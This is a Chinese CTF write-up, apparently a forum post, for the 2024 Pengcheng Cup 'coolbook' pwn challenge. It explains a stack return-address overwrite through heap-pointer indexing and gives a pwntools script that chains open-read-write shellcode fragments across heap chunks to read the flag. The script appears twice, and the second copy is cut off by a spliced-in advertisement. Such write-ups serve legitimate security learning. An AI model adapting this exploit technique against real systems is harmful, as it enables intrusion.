-
-
[原创]2024鹏城杯coolbook
-
发表于: 2024-11-10 15:31
-
这一次鹏城杯只做出了一道栈题,方法比较麻烦,还有比赛到后面服务器居然烂了……
漏洞就在于add里面可以申请0x31个堆块并且地址保存在栈上,根据动调可以发现申请下标为31的堆块即可覆盖返回地址。
由于程序开了沙箱,我们只能orw
由于每次申请堆块我们只能 输入0x10大小的数据,所以这道题目我申请多个连续堆块来布置shellcode,通过第一个开头的堆块覆盖返回地址执行shellcode并跳转到下一个shellcode,后面的堆块则按照shellcode指令堆块A—>保存堆块C地址的堆块B —>shellcode指令堆块C来排列和保存。
看起来很简单,实际还需要调试一下每一次shellcode跳转的偏移,比较耗费时间。做完之后想了一下还不如一次调试,算明白偏移后面的shellcode直接修改更加省事情。
我的解法有点麻烦,感觉还有更加简单的方法。
from pwn import *
#io=remote()io=process('./cool_book')
elf=ELF('./cool_book')
context(log_level = "debug",arch = "amd64",os = "linux")
ru = lambda a: io.recvuntil(a)
r = lambda n: io.recv(n)
sla = lambda a,b: io.sendlineafter(a,b)
sa = lambda a,b: io.sendafter(a,b)
sl = lambda a: io.sendline(a)
s = lambda a: io.send(a)
def add(dex,content):
sla("3.exit",b"1")
sla("input idx",str(dex))
sa("input content",content)
def free(dex):
sla("3.exit",b"2")
sla("input idx",str(dex))
ru("addr=")
addr = int(r(14),16)
print("addr==============>",hex(addr))
shellcode1 = asm('''
push 0x67616c66jmp [rip+0x25]''')
shellcode2 = asm('''
mov rdi,rspjmp [rip+0x27]''')
shellcodeA = asm('''
xor rdx,rdxjmp [rip+0x27]''')
shellcode3 = asm('''
xor esi,esijmp [rip+0x28]''')
shellcode4 = asm('''
mov eax,2jmp [rip+0x25]''')
shellcode5 = asm('''
syscalljmp [rip+0x28]''')
shellcode6 = asm('''
mov edi,eaxjmp [rip+0x28]''')
shellcode7 = asm('''
mov rsi,rspjmp [rip+0x27]''')
shellcode8 = asm('''
xor eax,eaxjmp [rip+0x28]''')
shellcode9 = asm('''
mov rdx,0x100jmp [rip+0x23]''')
shellcode10 = asm('''
syscalljmp [rip+0x28]''')
shellcode11 = asm('''
xor edi,2jmp [rip+0x27]''')
shellcode12 = asm('''
mov eax,edijmp [rip+0x28]''')
shellcode13 = asm('''
syscall''')
add(0,shellcode1)
add(1,p64(addr+0xd0))
add(2,shellcode2)
add(3,p64(addr+0x130))
add(4,shellcodeA)
add(5,p64(addr+0x190))
add(6,shellcode3)
add(7,p64(addr+0x1f0))
add(8,shellcode4)
add(9,p64(addr+0x250))
add(10,shellcode5)
add(11,p64(addr+0x2b0))
add(12,shellcode6)
add(13,p64(addr+0x310))
add(14,shellcode7)
add(15,p64(addr+0x370))
add(16,shellcode8)
add(17,p64(addr+0x3d0))
add(18,shellcode9)
add(19,p64(addr+0x430))
add(20,shellcode10)
add(21,p64(addr+0x490))
add(22,shellcode11)
add(23,p64(addr+0x4f0))
add(24,shellcode12)
add(25,p64(addr+0x550))
add(26,shellcode13)
free(0)
""" gdb.attach(io,"b *$rebase(0x161D)")pause() """add(0x31,shellcode1)
sla("3.exit",b"3")
print("addr==============>",hex(addr))
io.interactive()from pwn import *
#io=remote()io=process('./cool_book')
elf=ELF('./cool_book')
context(log_level = "debug",arch = "amd64",os = "linux")
ru = lambda a: io.recvuntil(a)
r = lambda n: io.recv(n)
sla = lambda a,b: io.sendlineafter(a,b)
sa = lambda a,b: io.sendafter(a,b)
sl = lambda a: io.sendline(a)
s = lambda a: io.send(a)
def add(dex,content):
sla("3.exit",b"1")
sla("input idx",str(dex))
sa("input content",content)
def free(dex):
sla("3.exit",b"2")
sla("input idx",str(dex))
ru("addr=")
addr = int(r(14),16)
print("addr==============>",hex(addr))
shellcode1 = asm('''
push 0x67616c66jmp [rip+0x25]''')
shellcode2 = asm('''
mov rdi,rspjmp [rip+0x27]''')
shellcodeA = asm('''
xor rdx,rdxjmp [rip+0x27]''')
shellcode3 = asm('''
xor esi,esijmp [rip+0x28]''')
shellcode4 = asm('''
mov eax,2jmp [rip+0x25]''')
shellcode5 = asm('''
syscalljmp [rip+0x28]''')
shellcode6 = asm('''
mov edi,eaxjmp [rip+0x28]''')
shellcode7 = asm('''
mov rsi,rspjmp [rip+0x27][培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
